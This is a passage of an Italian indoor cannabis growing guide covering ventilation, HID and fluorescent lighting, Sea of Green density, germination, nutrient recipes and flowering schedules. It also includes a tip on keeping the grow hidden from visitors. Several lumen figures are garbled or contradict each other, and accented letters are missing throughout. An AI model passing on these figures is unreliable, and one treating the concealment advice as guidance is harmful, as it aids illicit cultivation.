d'aria in cima alla stanza per eliminare l'aria pesante verso la soffitta o fuori dal tetto, 
ed una per portare dentro aria dall'esterno o da una grata sotto il pavimento. Serviti di 
ventole di raffreddamento di vecchi computer, disponibili da rivenditori di elettronica per 
5 dollari americani. Interruttori a reostato possono essere usati per regolare la velocit o 
il rumore dei ventilatori. Usa silicone per assicurare i ventilatori a tubi in PVC di 10-15 
centimetri infilati in buchi tondi aperti nel pavimento e sul soffitto. Usa molto silicone 
per attutire le vibrazioni dei ventilatori, in modo che i muri non entrino in risonanza con 
le oscillazioni delle ventole.  
Rivesti i muri con fogli di alluminio, il lato opaco all'esterno per diffondere la luce e 
prevenire i punti caldi, oppure dipingi i muri di bianco riflettente per meglio propagare 
la luce. Pannelli calorizzati, dello spessore di 0,02 millimetri sono la cosa pi 
indicata. (20 dollari per 7,5 metri di 1/4 di un rotolo esteso.) Gli specchi non sono 
molto indicati, visto che il vetro assorbe la luce!  
Rivesti il pavimento con fogli plastificati in caso di spargimenti d'acqua, ecc... 
Installa una presa di interruzione della tensione (salvavita) ed assicurati che il 
cablaggio elettrico regoli le lampade secondo le tue esigenze d'uso. Usa sempre regolatori 
di corrente per lampade HID su mensole, e anche per quelle che si trovano sopra il livello 
del pavimento, in caso di spargimenti d'acqua. Mettendo prolunghe sul pavimento sotto i 
regolatori di corrente, andr bene lo stesso.  
Una mensola sopra la principale area di coltivazione pu essere usata per clonare i tagli e 
germogliare le pianticelle. Permetter inoltre di raddoppiare l'area di coltura e sar un 
inapprezzabile spazio di deposito per i nutrimenti della pianta, bombolette spray ed altro 
materiale da giardinaggio. Questa area si mantiene molto calda, cos non ci sar bisogno di 
alcun sistema di riscaldamento per la fase della germinazione, permettendoti di risparmiare 
parecchi soldi.  
Appendi una tenda che non fa passare la luce per separare questa mensola dall'area 
principale quando la stai usando per la fioritura. Questo ti permetter di fornire luce 
costante alla mensola e periodi di buio nell'area principale dedicata alla coltivazione. 
Del velcro pu essere utilizzato per tenere le tende unite al loro posto e dei lacci per 
avvolgerle quando controlli l'area di coltivazione. Vinile nero con sostegni bianchi 
funziona meglio. 
Ora hai bisogno delle luci. Un paio di luci da negozio andranno benissimo se vuoi iniziare 
soltanto con piante all'interno per poi trasferirle fuori per crescerle in una piccola 
serra. Possono essere acquistate con lampadine per circa 10 dollari ciascuna, o senza 
lampadine per circa 8. Cerca di trovarle in svendita. Usa un tipo di lampadina a luce 
chiara (bianco freddo) ed una a luce calda per ottenere il pi ampio spettro di luce 
possibile per la crescita della pianta. Non usare tipi di lampadine specifici per la 
coltura, perch come non emettono molta luce, cos pure non servono a nulla nella maggior 
parte dei casi. 
Se sei riuscito a trovare soltanto una luce chiara, o  tutto ci che puoi permetterti, 
usala. Funziona benissimo ed  di gran lunga la pi conveniente (circa 1-2 dollari l'una).


UNA MENSOLA CHE CRESCE

Il trattamento della mensola con illuminazione a fluorescenza pu essere la strada del 
futuro, dal momento che il materiale  cos poco costoso e facile da reperire. Le lampade 
fluorescenti sono l'ideale per la cura della mensola. Con questo sistema possono essere 
installate molte mensole, una sopra l'altra, e lampade fluorescenti per ciascuna mensola. 
Alcune mensole avranno 24 ore di illuminazione, altre soltanto 12 ore (per la fioritura). 
Due aree vanno meglio, magari con un'altra dedicata alla clonazione e alla germinazione dei 
semi.  
Il trattamento della mensola presume il tuo impegno nel mantenere tutte le piante sui 
90 cm o meno alla maturazione, in modo da lasciare tutte le mensole separate da 90-120 
cm. Non  necessaria molta luce, quando hai piante che sono cos piccole e forzate a 
maturare in fretta. 
Uno svantaggio per una coltivazione su mensole di questo tipo  dato dal fatto che si 
impiega proprio molto tempo a regolare l'altezza della lampada ogni giorno, ed  molto 
difficile riuscire a prendere un periodo di ferie per anche una sola settimana senza 
curarsi del piccolo giardino. Questo  rivolto in particolar modo allo stadio vegetativo, 
quando le piante crescono molto anche di 2-3 cm al giorno. Le lampade sulle mensole in 
fase di fioritura non vengono regolate cos spesso.  
Normalmente, le lampade dovrebbero essere tenute 5 cm sopra le piante, con le piante 
sistemate in modo tale che diventino progressivamente pi alte mano a mano che la lampada 
viene portata in alto, e tutte le piante rimangano costantemente alla distanza di 5 cm. 
Questa  comunque una soluzione, e se vai in vacanza, regola le lampade in modo da essere 
sicuro che le piante non potranno crescere fino alle lampade in questo lasso di tempo. 
Se lampade abbastanza fluorescenti sono usate per illuminare completamente la mensola, la 
disponibilit di spazio non creer piante lunghe ed esili. Cresceranno soltanto un po' pi 
lentamente se le lampade non sono proprio vicine a loro.  
Un'alternativa  usare lampade fluorescenti per la clonazione, la germinazione e la 
crescita della piccola pianticella nella parte alta di uno stanzino, quindi passare ad una 
lampada HPS per una crescita vegetativa o fioritura accelerata  nell'area principale dello 
sgabuzzino.  
Posiziona l'HPS in modo tale che non avr bisogno di ulteriori sistemazioni, sul punto pi 
elevato dello sgabuzzino o della stanza. La maggior parte delle installazioni di HPS non 
richiederanno regolazioni dell'altezza della lampada. Fissa soltanto la lampada alla parte 
inferiore della mensola o sul soffitto pi in alto che puoi, e se vuoi mettere alcune piante 
pi vicine alla lampada, sistemale su una mensola provvisoria, uno scatolone o un tavolo. 
Una mensola  tutto ci di cui hai bisogno per questo tipo di trattamento, preferibilmente 
larga almeno 50 cm, fino a un massimo di 60. Questa area deve essere verniciata con colore 
bianco riflettente, o coperta con una lamina di alluminio, con il lato opaco all'esterno per 
riflettere la luce alle piante.  (Il Iato opaco all'esterno previene i punti caldi, cio le 
sovraesposizioni di luce in particolari zone circoscritte, in pi diffonde meglio la luce.) 
Dipingi anche la mensola di bianco. Oppure utilizza pannelli calorizzari (lett: aluminised 
mylar), un telo in materiale riflettente o qualche materiale con la superficie argentea. Non 
usare specchi, visto che il vetro assorbe la luce.  
Appendi lampade da negozio a catene e assicurati di poterle regolare con ganci o con altri 
generi di meccanismi in modo che possano essere tenute il pi possibile vicino alle piante 
in ogni momento. Se le lampade sono troppo lontane dalle piante, le piante potrebbero 
crescere lunghe, con gambi stretti e storti nel tentativo di raggiungere la lampada, e non 
produrranno molte gemme a maturazione avvenuta. Questo  dovuto essenzialmente alla distanza 
molto pi alta tra gli internodi, cio la lunghezza del gambo tra ogni gruppo di foglie. Se 
 pi corta, ci possono essere pi internodi, cos pi rami, cos una pianta che produce 
pi gemme in meno spazio in tempo di raccolto.  
La cura della mensola  di tanto in tanto trattata nel capitolo 'Un mare di verde', perch 
molte piante crescono insieme al chiuso, creando un baldacchino verde di cime che crescono 
e maturano rapidamente, mentre il raccolto successivo comincia e continua a crescere in 
un'area separata a luce continua. I cloni vanno sviluppati su una mensola a luce continua, 
fino a quando attecchiscono ed entrano nella fase di crescita vegetativa, quindi vanno 
posti su una mensola con 12 ore di luce al giorno per la fioritura.


ILLUMINAZIONE

All'interno, circa 20000 lumen per metro quadro  il quantitativo minimo per cominciare la 
coltivazione. Se ti tieni sotto questo livello, la crescita della pianta non sar certamente 
tanto rapida quanto nelle sue possibilit, e la lunghezza internodo-fusto aumenter. Inoltre, 
anche la distanza della luce dalle piante sar molto pi critica. Regolazioni quotidiane 
delle lampade saranno cos necessarie, e ci significa che tu non andrai in vacanza. 
25000 lumen/mq dovrebbe essere un buon valore, 30000  ottimale se ti presti ad integrare o 
arricchire il livello di CO2 (ne parleremo in seguito).  
Le lampade a luminescenza ad alta intensit (HID: High Intensity Discharge) sono la 
soluzione migliore per la maggior parte dei coltivatori al coperto. Le lampade HID si 
dividono in 3 categorie di base: Sodio ad Alta Pressione (HPS: High Pressure Sodium), 
Alogenuro di Metallo (MH: Metal Halide) e Vapore di Mercurio (MV: Mercury Vapor). L'Alogenuro 
di Metallo ha uno spettro pi ampio, il Vapore del Mercurio  progettato per una intensit 
pi elevata. Il Sodio ad Alta Pressione  una sorta di luce giallastra, forse un pizzico 
rosa o arancione. La stessa di alcuni lampioni stradali. 
Le lampade HPS possono essere usate per coltivare un raccolto dall'inizio alla fine. Test 
dimostrano che il raccolto con HPS matura una settimana dopo rispetto ad un pari raccolto 
sotto MH, ma  un raccolto pi abbondante, cos  meglio attendere la settimana aggiuntiva. 
Le HID pi facili da reperire, e le meno costose inizialmente sono le lampade a fluorescenza 
e al vapore di mercurio. Le MV garantiscono circa 7500 lumen per 175 watt, e i 150 watt delle 
HPS generano circa 14000 lumen, cos le  HPS sono quasi il doppio pi efficienti. Ma lo 
spettro del colore prodotto dalle MV non  poi tanto buono. Le HPS hanno elevati valori del 
rosso, che  particolarmente indicato per la fioritura, mentre le MH sono prestanti nei 
valori del blu, richiesto per una migliore crescita vegetativa. Sfortunatamente, le lampade 
MV forniscono lo spettro meno indicato per la crescita della pianta, ma sono veramente 
economiche. Non sono consigliabili, a meno che tu non riesca a recuperarle gratuitamente, e 
in pi, il rapporto elettricit/efficienza ripaga l'investimento iniziale.  
Una HPS da 400 watt emetter intorno ai 4 mila lumen. Per ogni 500 watt di uso continuo, 
spendi circa 20 dollari americani al mese in elettricit, cos  evidente che con una 
lampada che consuma la met per produrre gli stessi lumen (o il doppio dei lumen a parit 
di potenza) pagherai lo stesso in un anno o gi di l, e da allora in poi, verranno raccolti 
continui risparmi. Questo  un semplice costo iniziale a confronto con un calcolo delle spese 
di gestione, e non prende in considerazione una crescita pi rapida e l'aumento della 
produzione che le lampade HPS ti assicurano, dovuto alla  quantit di luce disponibile. Se 
questo  fattorizzato nel calcolo le lampade HPS ti ripagheranno gi dal primo raccolto, 
paragonate alle lampade MV o a fluorescenza, dal momento che raggiungono facilmente il 
doppio in quanto ad efficienza e fanno crescere i fiori pi velocemente e con dimensioni 
maggiori.

Tipo di lampada			Watt	    Lumen per lampadina		Efficienza totale

Lampada a fluorescenza		40		2800				400 watt = 2800 lumen 
Vapore di mercurio		175		7500				400 watt = 18500 lumen
Alogenuro di metallo		400		33500				400 watt = 33500 lumen
Sodio ad alta pressione		400		42000				400 watt = 42000 lumen

Nota che le lampade a vapore di mercurio sono meno efficienti di quelle a fluorescenza (FL), 
e non possono essere posizionate vicino alle piante, cos le piante non potranno usare buona 
parte della luce delle MV. La distribuzione della luce non  buona in entrambi i casi. Le 
lampade MV semplicemente non sono indicate per la coltura al coperto. Usa esclusivamente 
lampade fluorescenti, MH o HPS. Le lampade alogene ad arco generano molto calore e non molta 
luce per il wattaggio che usano, e non sono raccomandate, pur se lo spettro di luce  
appropriato per una crescita decente. 
C' un nuovo tipo di lampada HPS chiamata Son Agro, ed  disponibile da 250, 400 e 1000 watt. 
Quella a 400  in realt a 430 watt; sono stati aggiunti 30 watt di blu a questa 
lampadina. E' una lampada molto luminosa (50 mila lumen) ed  pensata per un uso nelle serre. 
Queste lampadine possono essere acquistate per sostituire le normali lampadine HPS, cos 
possono essere una eventualit se gi possiedi una lampada HPS. La cosa bella di questa 
lampadina  che non si rinuncia alla maggior parte dei vantaggi delle lampade MH, come la 
minima distanza tra gli internodi e una maturazione precoce, come pu confermare la maggior 
parte degli utilizzatori delle HPS, e si hanno tutti i vantaggi delle lampade HPS. Un'unica 
lampadina che fa tutto. 
La lunghezza internodale delle piante cresciute con la Son Agro  la pi corta che si sia 
mai vista con qualsiasi tipo di lampada. Le piante cresciute sotto questa lampada sono 
incredibilmente folte, compatte e si sviluppano molto in fretta. Le lampadine Son Agro 
comunque, non durano tanto a lungo quanto una normale lampadina HPS. C' una differenza di 
circa il 25% in meno nella vita della lampadina. 
La lampada all'alogenuro di metallo (MH)  un'altra alternativa, ed  disponibile in 
lampadine sia da 33500 che da 37000 lumen per 400 watt. La super lampadina (Super Bulb - 
37000 lumen) costa circa 10-15 dollari, e garantisce un extra di 3500 lumen. Credo che la 
Super Bulb possa durare pi a lungo; in tal caso,  la soluzione da prendere. La luce 
dell'alogenuro  pi blu e migliore della HPS per la crescita vegetativa, ma complessivamente 
 molto meno efficiente della HPS. E' possibile acquistare delle lampadine di conversione per 
una lampada MH che la converte a HPS, ma il costo della lampadina-convertitore  maggiore 
della lampadina Son Agro con la correzione del colore, cos  raccomandabile acquistare 
soltanto una Son Agro HPS. Anche se costa di pi inizialmente, risparmierai energia e soldi 
dopo, ed  molto pi facile da appendere rispetto a 10 tubi fluorescenti.  
Se possiedi una lampada MH da 33500 lumen che gira a 400 watt ed una HPS da 5 mila lumen 
che gira a 430 watt, qual' la pi indicata? Quale garantir un miglior raccolto? 
Naturalmente, la Son Agro HPS, anche se il costo iniziale  pi elevato. A dire il vero, 
il regolatore di corrente aggiunger un buon 10% in pi al wattaggio complessivo. 
La lampadina Son Agro si riveler di gran lunga migliore della MH per ogni utilizzo. La MH 
non dura molto a lungo, ma  pi conveniente. Confronta i 36 dollari per una lampadina MH da
400 watt contro i 40 dollari per una HPS. Aggiungi 15 dollari per la Son Agro HPS. La HPS ha 
una durata media superiore di due volte. 21 mila ore contro 10 mila. La Son Agro  di 16 mila 
o gi di l. Ancora, pi la vita della lampadina  lunga e pi luce aggiungi, risparmiando 
denaro per l'energia. 
Sistemare orizzontalmente una HID  una buona idea, visto che aumenter del 30% la quantit 
di luce che normalmente giunge alle piante. La maggior parte delle HID vendute per l'uso in 
giardini al coperto in questo periodo sono sistemate in questa posizione orizzontale. 
La HPS ha un funzionamento molto meno costoso di qualsiasi altro tipo di lampada, ma viene 
venduta a 70 watt nei negozi di articoli per la casa. Questa taglia non  molto indicata, 
ma surclassa la FL in efficienza, cos potrebbe essere una valida alternativa alla FL per 
progetti su piccola scala, tipo 1 metro quadro o meno. Oltre il metro quadro, hai bisogno 
di pi luce di quanta una di queste lampade pu apportare, ma potresti usare due di queste. 
Le lampade HPS da 70 watt costano 40 dollari ciascuna, complete. Due lampade sarebbero 140 
watt che irraggiano 11000 lumen, che  un risultato migliore di quello delle FL, ma una HPS 
da 150 watt diffonde 16500 lumen, la vita della lampadina  pi lunga, le lampadine sono pi 
convenienti e la lampada opera con maggiore efficienza. Il problema pi grosso  che le 
lampade di media potenza come le HPS da 150 e 250 watt costano quasi come la pi grande da 
400. Per questa ragione se hai spazio per la lampada pi grande, compra quella da 400. Se sei 
d'accordo, un modello da 1080 watt  altres disponibile, ma potresti trovare una migliore 
diffusione della luce con due da 400 piuttosto che una lampada grande. Naturalmente le due 
lampade pi piccole sono pi costose da acquistare che una lampada grande, cos la maggior 
parte delle persone sceglie la lampada pi grande per operazioni pi grandi.
Produrre calore nella stanza  una caratteristica delle lampade HID, e quanta luce le piante 
possono assimilare  determinata dalla temperatura, dal livello di CO2, dalla disponibilit 
di nutrimento, dal pH, e da altri fattori. Una lampada troppo grande per un spazio richieder 
una necessaria ventilazione costante, ed allora non c' altra soluzione che arricchire la CO2, 
dal momento che ne risente immediatamente. 
Costo della lampadina: il costo della lampadina HPS da 70 watt  di 24 dollari, da 150  solo 
di 30, e da 400  solo di 40. In questo modo spenderai di pi a sostituire due HPS da 70 watt 
che una da 400 watt. Aggiungi anche che il pi basso valore per rivendere il modello da 70 
watt  praticamente nullo per il fatto che sono usate e non soddisfano pi questa domanda, e 
risulta evidente che 189 dollari per una HOP da 250 o 219 dollari per una da 400, pu essere 
che valga il prezzo. Tieni a mente che per 30 in pi, puoi avere la lampada pi grande (400 
watt) e irradiare oltre 1850 lumen di luce in pi della lampada pi piccola. Niente male!  
Qui di seguito c' un'analisi dei prezzi:

Tipo di lampada		Costo complessivo		Costo lampadina		Vita lampadina 	Lumen

HPS 400			219 dollari USA		40 dollari USA	    	18000 ore		4650 0
MH 400			175 dollari USA		37 dollari USA		10000 ore		33500
Son Agro 400		235 dollari USA		55 dollari USA		15000 ore		49000
Super MH 400	      190 dollari USA		45 dollari USA		?			37000
MH 250			149 dollari USA		32 dollari USA		?			19500
HPS 250			165 dollari USA		36 dollari USA		?			25000
HPS agro 250		180 dollari USA		53 dollari USA		?			28000
MH 150			139 dollari USA		25 dollari USA		?			13000
HPS 175			150 dollari USA		30 dollari USA		?			15500

Se stai cercando uno questi tipi di lampade, guarda sulle Pagine Gialle alla voce 
giardinaggio, serre ed illuminazione per giardini al coperto nella tua zona.
Qui in Italia, ho potuto notare che le lampadine HPS e MH a bulbo pi convenienti sono 
le philips: 
Philips HPS son-t 250W (per superfici di circa  mq -> fase di fioritura); 
Philips HPS son-t 400W (per superfici di circa 1 mq -> fase di fioritura);
Philips MH hqt 250W (per superfici di circa  mq -> fase di crescita vegetativa);
Philips MH hqt 400W (per superfici di circa 1 mq -> fase di crescita vegetativa);

e le osram [n.d.t.].


MARE DI VERDE
 
Il 'Mare di Verde' (SOG: Sea of Green)  la teoria della raccolta di una parte di piccole 
pianticelle, portate alla maturazione in breve tempo per ottenere la pi rapida produzione 
di gemme a disposizione. Invece di crescere solo poche piante per un periodo pi lungo di 
tempo, nello stesso spazio si fanno crescere molte piante pi piccole che maturano velocemente 
ed in meno tempo. Cos,  richiesto un tempo minore tra i raccolti. Questo sar importante 
per te quando ti arriveranno a casa ogni mese le bollette della luce. Si pu iniziare un 
raccolto mentre l'altro matura, ottenendo cos una produzione a ciclo continuo, che pu 
essere mantenuta per tutto il corso dell'anno. 30-40 piante per metro quadro (4 piante per 
piede quadrato) dovrebbero essere un buon inizio. 10 piante per metro quadro ti garantiranno 
spazio in abbondanza tra ogni pianta per sviluppare le parti superiori, ma non garantiranno 
molte diramazioni pi in basso. Questo va bene per l'interno, dove i rami bassi sono sempre 
in qualche modo ombreggiati, e non cresceranno molto bene a meno che tu non provveda a 
fornire pi luce e spazio. Il coltivatore al coperto capisce al volo che le piante troppo 
alte non crescono abbastanza nelle parti basse cos da rendere inutile il tempo extra dedicato 
alla coltivazione. Questa  un'eccezione alla regola se si vuole portare ad un certo punto
 le piante all'aperto, e si ritiene che il rapporto luce/ombra non sia un fattore determinante.  
Le piante, se sono state seminate allo stesso tempo, dovrebbero formare quello che viene 
chiamato un "baldacchino verde" che trattiene la maggior parte della luce nelle zone alte
 delle piante. Una luce fioca filtra sotto questo livello, visto che le piante sono cos 
vicine tra loro. Il giardiniere si presta a concentrarla sulla cima della pianta, e usa la
 luce e lo spazio per meglio avvantaggiarsi nel minor tempo possibile. L'uso di recinzioni
 di nylon o sostegni simili sistemati sul baldacchino verde sosterr le piante quando 
iniziano a piegarsi sotto il peso delle voluminose estremit fiorite. Possono essere usati
 anche dei paletti, ma non  facile inserirli per le piante in mezzo e in fondo allo spazio,
 dove  pi difficile arrivarci. 
Volere grandi piante  scontato, dal momento che producono di pi per pianta, ma di solito 
 meglio, con uno spazio limitato, coltivare piante pi piccole che maturano pi in fretta 
e stanno in spazi ridotti. Il 'Mare di Verde'  stato sviluppato in Olanda. Invece di 
stipare 4 piante grandi in uno spazio angusto, si mettono 12 pi piccole su una mensola 
sopra a 12 altre pianticelle. Queste piante abbisognano solo di 3-4 mesi per maturare dalla
 germinazione alle gemme mature, e il raccolto pu aver luogo in continuazione.


GERMINAZIONE 

Fai crescere i semi in terreno povero (se decidi di piantare all'aperto) o in ambiente 
idroponico a base di lana di roccia o di vermiculite. Non usare uno scatolone riempito per 
piantare i semi. Prove non ufficiali e l'esperienza dimostrano che questi "cubi di torba" 
non servono a nulla ma anzi arrestano lo sviluppo della pianta. Piantare nella vermiculite 
d alla pianticella cos tanto ossigeno, ed  cos facile per le radici svilupparsi, che le 
piante si rivelano gi grandi una settimana dopo la germinazione!  
Tienile all'umido per tutto il tempo, piantando i semi in tazze da 500 grammi con buchi sul 
fondo riempite con vermiculite, sistemate in una bacinella di soluzione nutriente diluita 
oppure concentrata in contenitori in lana di roccia funzioner altrettanto bene. Quando il 
seme germoglia, sistema i cubi in lana di roccia in altri contenitori in lana di roccia pi 
grandi. Non ripiantarli in vaso o trapiantarli altrove, e non metterli insieme alla terra!  
Puoi coltivare i semi in una carta assorbente. Questo metodo  complicato;  facile 
compromettere le radici se vengono asciugate, o piantate troppo tardi dopo la germinazione. 
La carta assorbente asciuga veramente in fretta! Metti la carta assorbente in una vaschetta, 
riempita con soluzione nutriente diluita (non troppo!), e coprila con un involucro di 
plastica per impedire che evapori. Metti la vaschetta in un posto al caldo; sopra una stufa 
a gas, un termosifone, o sopra lampade calde. Coprila con carta nera per impedire alla luce 
di entrare. Controllala ogni 12 ore e pianta i semi germinati, allo spuntare delle cime (se 
possibile) in un ambiente naturale indicato per la crescita tanto presto quanto lo spuntare 
delle radici dal seme sia di 2 millimetri o pi. Serviti di pinzette, e non toccare le punte 
delle radici. Trapianta i semi il meno possibile lasciandoli germinare nello stesso 
contenitore in cui decidi di coltivare la pianta per un periodo significativo di tempo. 
Pianta esclusivamente in vermiculite o in lana di roccia. Sarai stupito dai risultati! Il 
90% della germinazione si basa su questo metodo, confrontato al 50% o meno degli scatoloni 
(lett: Jiffy Cubes). (Il tuo profitto pu variare.)
Il nutrimento per piante 5-55-17 come il Peter's Professional incentiver lo sviluppo delle 
radici del seme che germina e delle giovani piantine. Usa una soluzione molto diluita, in 
acqua distillata, circa 1/3 della concentrazione normale, e mantieni la temperature tra i 
22 e i 25 gradi. Un clima caldo  di fondamentale importanza. Secondo l'esperienza di molti 
coltivatori si ha un basso indice di germinazione se la temperatura non  compresa tra questi 
valori. Un termostato impostato su valori bassi o medi pu rivelarsi indispensabile, oppure 
una mensola continuamente riscaldata da una luce, ma prova con pochi semi, prima di dedicare 
i raccolti degli anni a venire a quel sistema. Nessuna luce  indispensabile visto che pu 
rallentare la germinazione. Copri i semi che germinano con carta nera per impedire alla luce 
di entrare. Metti le pianticelle alla luce una volta che sono germogliate. 
Proponiti di trapiantare solo una volta o due prima del raccolto. Serviti del pi grande 
contenitore a tua disposizione per lo spazio e il numero di pianticelle che intendi coltivare. 
Le piante soffrono se le trapianti continuamente e ritardano il raccolto. Soffrirai anche tu, 
dall'eccessiva fatica! 13 bottiglie di plastica di Coca Cola da 2 litri riempite con 
vermiculite/perlite staranno giuste in una vaschetta come, ad esempio, una lettiera per 
gatti e non richiederanno trapianto per il primo raccolto, se intendi coltivare 
idroponicamente.  
Trapiantale per un secondo raccolto rigenerato.  
Elimina i buchi sul fondo dei contenitori e riempi i pochi centimetri rimasti in cima al 
contenitore solo di vermiculite, per piantare i semi o per consentire il trapianto delle 
piantine. 
Dal momento che la vermiculite trattiene molto bene l'acqua, ma non pu trattenerne molta, 
le radici hanno sempre molto ossigeno, anche se sono poste in una vaschetta piena d'acqua. 
Il fertilizzante basato su perossido di idrogeno  usato per apportare ossigeno addizionale 
alle piante quando i recipienti sono tenuti continuamente pieni (d'acqua). L'acqua pu essere 
lasciata diminuire ogni volta dopo l'innaffiamento, prima di aggiungere una nuova soluzione. 
Questo permette alle radici delle piante di asciugarsi bene, e assicura un sufficiente 
apporto di ossigeno. 
Usa il prodotto SuperSoil quando metti la terra nel vaso, perch  eccellente e sterilizzato. 
Se vuoi continuare a prendere terra dal cortile, sterilizzala in un forno a microonde o in 
uno tradizionale fino a quando non si appanna il vetro. NON RACCOMANDATO: sterilizza i 
contenitori con una soluzione a base di candeggina, specialmente se sono stati usati nella 
stagione precedente per coltivare altro.



CRESCITA VEGETATIVA 

Una volta germogliata, la pianta comincia la crescita vegetativa. Questo vuol dire che la 
pianta inizier il processo di fotosintesi per svilupparsi in altezza il pi possibile e 
former molte diramazioni (piccioli) per ogni coppia di foglie. Il picciolo (lett: grow tip) 
 la parte che pu essere clonata o riprodotta in forma asessuata. E' localizzato all'apice 
della pianta e in ogni principale internodo. Se tagli l'apice della pianta, allora ottieni 
due piccioli in cima. Se tagli ciascuno di questi, avrai 4 piccioli in cima alla pianta. 
(Dal momento che ci vuole tempo perch la pianta riassorba e si riprenda dal trauma della 
potatura,  pi rapido crescere 4 piante pi piccole senza tagliarle affatto. Oppure 
coltivare 2 piante, e farle crescere in modo da riempire lo stesso spazio. La maggior 
parte dei coltivatori lo prova.  
Tutte le piante hanno uno stadio vegetativo in cui crescono il pi rapidamente possibile 
subito dopo la germinatura della pianta dal seme. E' possibile coltivare le piante senza 
periodi di buio, ed aumentare la velocit con la quale crescono di un buon 15-30%. Le 
piante possono essere riprodotte vegetativamente, cio senza il concorso di organi 
sessuali, indefinitamente. Sta al giardiniere decidere quando forzare la pianta a fiorire. 
Una pianta pu crescere da 30 cm a 3,5 m prima di essere forzata a fiorire, cos ogni 
giardiniere ha molta libert per amministrarsi il proprio giardino in base agli obiettivi 
che vuole conseguire e allo spazio disponibile. 
Una soluzione di 20-20-20 con minerali in tracce  usata sia per le colture idroponiche che 
per quelle in terra quando crescono in continuazione sotto luce. Il nutrimento per piante 
Miracle Grow Patio o RapidGrow va bene per ci. Un nutrimento ad alto contenuto di fosforo 
(high P) come il Peter's 5-50-17  utilizzato per far fiorire e fruttificare le piante quando 
stanno per 12 ore al giorno. Sale inglese (1 cucchiaino da t) dovrebbe essere usato nella 
soluzione per l'apporto di magnesio e minerali a base di zolfo. Minerali in tracce sono 
altrettanto indispensabili, se il tuo nutrimento non li include. Il Miracle Grow Patio 
include questi elementi in tracce, ed  caldamente consigliato. 
Mantieni un'illuminazione continua per i germogli, dal momento che non richiedono periodi di 
buio come le piante pi mature. Non avrai bisogno di un timer a meno che non voglia tenere 
le lampade spente per un certo periodo al giorno. Cerca di illuminare le piante per 18 o pi 
ore, o in continuazione in questa fase. 
Curva il fusto della pianticella avanti e indietro per spingerlo ad essere molto spesso e 
robusto. Steli lunghi e sottili non possono sostenere una crescita pesante dei germogli. Un 
ventilatore interno ridurr l'umidit sugli stomi delle foglie e migliorer anche la 
robustezza del fusto. L'importanza della circolazione dell'aria interna non pu essere mai 
sottolineata a sufficienza. Rafforzer le piante e le far crescere pi forti, mentre ridurr 
molte insidie che potrebbero mettere a rischio il tuo raccolto. 

SOLUZIONE VEGETATIVA IDROPONICA, per gallone (circa 4 litri):  

-	Miracle Grow Patio (contiene elementi in tracce): 1 cucchiaino 
-	Sale inglese: 1/2 cucchiaino 
-	Urina umana (OPZIONALE- pu provocare odori sgradevoli in ambienti chiusi.): 1/4 di tazza
-	Nutrimento per piante arricchito con ossigeno (OPZIONALE): 
		1 cucchiaino 

Questo cocktail assicurer alle tue piante tutti i principali e secondari nutrimenti nella 
soluzione, e in pi tratter le tue piante con ossigeno per una crescita ottimale delle 
radici, e nitrato di potassio per una buona qualit di combustione. Un altro "ingrediente" 
per una buona fase di sviluppo  1/4 di cucchiaino di fertilizzante Peter's 20-20-20 per 
gallone d'acqua, con elementi in tracce ed ossigeno aggiunto, o emulsioni di pesce. Le 
emulsioni di pesce sono eccezionali in serre o all'aperto, dove gli odori non sono un 
problema, ma non sono raccomandate per gli interni, a causa del loro fetore.




FIORITURA 


La pianta sar indotta a fruttificare o fiorire con cicli di buio di 11-13 ore che simulano 
l'approssimarsi dell'inverno all'autunno con l'accorciarsi delle giornate. Di conseguenza, 
va meglio all'aperto avere due aree separate; una usata per l'iniziale stato vegetativo ed 
una per la fioritura e la fruttificazione. Non c' nessuna altra necessit oltre a mantenere 
cicli di buio, molto buio senza intermezzi di luce, altrimenti le piante possono ritardare la 
fioritura di giorni o addirittura settimane.
Una volta che la pianta  abbastanza sviluppata per la maturazione (30 cm o pi), periodi di 
buio sono richiesti per la maggior parte delle piante per fiorire e produrre i frutti. Ci 
ti costringer a mettere un timer alla lampada, per ricreare regolari e rigidi periodi di 
buio e di luce ininterrotta. In serra lo stesso effetto pu essere causato d'estate (giorni 
lunghi) coprendola con una coperta per creare periodi di oscurit pi lunghi. Un rigido 
orario di copertura delle piante alle ore 20 e di scoperta alle 8 del mattino per 2 
settimane spinger le tue piante a fiorire. Dopo le prime 2 settimane l'orario pu 
essere pi flessibile, ma sar ancora necessario continuare questa routine per le 
piante fino alla completa fioritura senza regredire allo stadio della crescita vegetativa. 
All'aperto, in primavera e in autunno, le notti sono sufficientemente lunghe da spingerle a 
fiorire di continuo. Porta semplicemente le piante dall'interno all'esterno in questo 
periodo, e le piante fioriranno naturalmente. In estate inoltrata, con l'avvicinarsi 
dell'autunno, pu essere necessario solamente forzare la fioritura nelle prime due 
settimane, quindi il rapido allungarsi della notte far il resto. 
Dai alle piante in fioritura nutrimenti ad alto contenuto di fosforo e mantienile in un 
rigoroso regime di 12 ore di illuminazione, senza luce, o al massimo la luna piena durante 
il ciclo di buio. 13 ore di luce, 11 di buio possono aumentare le dimensioni del fiore e 
inoltre permettono alla pianta di entrare in fioritura. Serviti di periodi di buio pi 
lunghi per velocizzare la maturazione verso la fine del ciclo di fioritura (8-10 giorni). 
Ci comunque ridurr il raccolto complessivo. 
Si possono usare due mensole, una identica all'altra, se si desidera fare esclusivamente 
del giardinaggio al coperto. Le luci di una mensola sono impiegate per 12-13 ore, e quelle 
dell'altra restano accese di continuo. Le piante vengono tirate su a luce continua, e 
spostate nell'altra mensola per maturare con la fioritura dopo diverse settimane. Questa 
mensola per la fioritura dovrebbe essere pi grande della mensola di partenza o della 
crescita vegetativa, in modo da sistemare piante pi grandi. O altrimenti, alcune piante 
possono essere portate fuori, se non c' abbastanza spazio sulla mensola della fioritura, 
per tutto il loro prossimo raccolto. 
Una tenda per fermare la luce pu essere costruita con del vinile nero, o altro materiale 
opaco, con un materiale riflettente sull'altro lato per riflettere la luce alle piante. 
Questa tenda pu essere bloccata con una cordicella quando viene riavvolta per lavorare 
nel tuo piccolo giardino, e pu essere fissata con del velcro per impedire alla luce di 
filtrare. Se la mensola  posizionata in alto, non sar molto visibile, e potr stare in 
ogni stanza. I curiosi non la vedranno mai a meno che tu non la indichi a loro, dal 
momento che si trova sopra il livello degli occhi, e nessuna luce proviene da l. 
le piante fioriscono con nutrimenti di fosforo a livelli molto alti, del tipo 5-50-17, ma 
anche il 10-20-10 dovrebbe essere adeguato. Le sostanze nutrienti dovrebbero essere 
accompagnate ogni volta da un innaffiamento quando le piante sono in prima fioritura. 
Elementi in tracce sono altrettanto necessari; cerca di trovare cibi che li includono, 
cos non devi usare anche un cibo a base di elementi in tracce a parte. Un piccolo 
